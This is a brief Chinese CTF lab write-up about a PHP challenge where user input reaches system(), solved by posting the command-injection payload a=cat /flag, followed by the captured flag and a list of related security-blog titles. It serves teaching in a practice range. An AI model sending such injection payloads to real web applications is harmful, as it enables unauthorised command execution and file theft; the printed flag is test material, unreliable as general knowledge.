开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
枷锁—sha6 小时前
Burp Suite 抓包全流程与 Xray 联动自动挖洞指南菩提小狗6 小时前
小迪安全2023-2024|第5天:基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载_笔记|web安全|渗透测试|AZ996ZA6 小时前
自学linux的第二十一天【DHCP 服务从入门到实战】聚铭网络6 小时前
聚铭网络再度入选2026年度扬州市网络和数据安全服务资源池单位架构师沉默6 小时前
这个问题,决定你能不能进大厂!软件检测小牛玛7 小时前
软件功能测试机构推荐:资质权威,报告认可的软件测评机构 中承信安方见华Richard7 小时前
方见华个人履历|中英双语版acrelwwj7 小时前
智慧照明新引擎,ASL600 4GWJ开启城市照明精细化管理新时代darkb1rd8 小时前
八、PHP SAPI与运行环境差异darkb1rd9 小时前
七、PHP配置(php.ini)安全最佳实践